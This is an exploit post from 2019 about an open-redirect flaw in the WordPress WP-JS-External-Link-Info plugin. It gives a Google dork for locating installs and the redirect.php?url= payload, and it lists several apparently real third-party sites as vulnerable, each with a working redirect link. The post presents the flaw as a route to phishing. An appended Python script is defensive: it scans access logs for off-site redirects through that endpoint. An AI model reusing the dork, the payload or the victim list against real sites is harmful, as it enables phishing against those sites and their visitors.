KingSkrupellos

WordPress WP-JS-External-Link-Info 2.2.0 Open Redirection

Feb 13th, 2019
####################################################################

# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
“WP External Links (nofollow new tab seo)” is open source software.

Manage external and internal links on your site.

####################################################################

# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability because the application fails to properly verify user-supplied input.

Exploiting this issue may allow attackers to redirect users to arbitrary web sites and conduct phishing attacks; other attacks are also possible.

WordPress Plugin WP Js External Link Info versions 1.21 - 1.81 and 2.2.0 are vulnerable; prior versions may also be affected.

####################################################################

# Open Redirection Exploit :
**********************

/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov

####################################################################

# Example Vulnerable Sites :
*************************
[+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com

[+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com

[+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/

[+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
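
Added example, not part of the original advisory or the plugin's code: a log check a site owner can run to find requests where the redirect.php endpoint described above was pointed at an off-site host. The host blog.example, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory above.
REDIRECT_PATH = "/wp-content/plugins/wp-js-external-link-info/redirect.php"
PARAM = "url"
# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log; blog.example stands in for the site's own host.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2019:10:01:12 +0000] "GET ' + REDIRECT_PATH
    + '?url=https://phish.example.net/login HTTP/1.1" 302 0',
    '198.51.100.4 - - [14/Feb/2019:10:02:40 +0000] "GET ' + REDIRECT_PATH
    + '?url=https://blog.example/about HTTP/1.1" 302 0',
    '203.0.113.9 - - [14/Feb/2019:10:03:05 +0000] "GET /wp' + REDIRECT_PATH
    + '?url=%2F%2Fphish.example.net HTTP/1.1" 302 0',
    '198.51.100.4 - - [14/Feb/2019:10:04:11 +0000] "GET /index.php?url=https://phish.example.net HTTP/1.1" 200 512',
]


def offsite_target(request_target, site_hosts):
    """Return the off-site host a request would redirect to, else None."""
    parts = urlsplit(request_target)
    # endswith() also covers WordPress installed in a subdirectory (/wp/...).
    if not parts.path.endswith(REDIRECT_PATH):
        return None
    # parse_qs percent-decodes, so encoded targets are compared decoded.
    for value in parse_qs(parts.query).get(PARAM, []):
        try:
            host = urlsplit(value.strip()).hostname
        except ValueError:  # malformed authority, e.g. unbalanced "["
            return "<unparseable>"
        # Relative targets have no hostname and stay on the site.
        if host and host.rstrip(".") not in site_hosts:
            return host.rstrip(".")
    return None


def scan(log_lines, site_hosts):
    """Return (line number, off-site host) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        host = offsite_target(match.group(1), site_hosts) if match else None
        if host:
            hits.append((number, host))
    return hits


if __name__ == "__main__":
    for number, host in scan(SAMPLE_LOG, {"blog.example"}):
        print(f"line {number}: redirect to off-site host {host}")
```

A hit means the endpoint was asked to send a visitor to a host outside the allowed set; site_hosts should list every hostname the site legitimately redirects to.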